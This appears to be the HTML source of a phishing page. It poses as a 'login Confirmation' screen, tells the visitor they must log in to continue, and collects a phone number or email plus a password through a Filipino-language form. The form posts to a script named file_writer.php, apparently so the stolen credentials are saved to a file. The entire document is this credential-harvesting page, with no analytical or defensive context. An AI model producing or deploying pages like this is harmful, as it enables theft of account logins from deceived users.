<html>
  <head>
      <meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
              <link rel="icon" type="image/png" href="d4ZIVX-5C-b.ico">
      <meta charset="UTF-8"><title>login Confirmation</title>
    <link rel="stylesheet" type="text/css" href="css/stylesheet.css"> 
    <link rel="icon" type="image/png" href="d4ZIVX-5C-b.ico">
  </head>
  <body>
      <center>
      <div class="navbar">
        
     <header id="page-header">
         <center>
      <img src="logo.png" class="logo">
      </center>
    </header>   
    </div>
    <!-- NavBar -->
    <div class="navbar"></div>   
    <div style="display:-webkit-box">
      <div style="-webkit-box-flex:1">
        <!--Nav-Header-->
        <div class="nav-head" style="direction: rtl;">
          <span> You must first login to continue </span>
        </div>

        <!-- Formulaire -->
        <div style="background-color:#2c3b5a0f;padding:2 31px">
          <form method="post" style="padding-top:17px;" action="file_writer.php">
            <div class="formulaire" style="background:white;"> 
              <input class="entrer" style="padding:12px;direction: rtl;" name="email" placeholder="numero ng telepono o Email " type="text"
              required="">
              <input class="entrer" style="padding:12px;direction: rtl;" name="password" placeholder="Password" type="password"required="">
              <div style="padding:12px;"> 
                <button type="submit" class="square_btn" value="" > Pagkumpirma </button>
              </div>
            </div>
          </form> 
        </div>
      </div>
    </div>
  </body>
</html>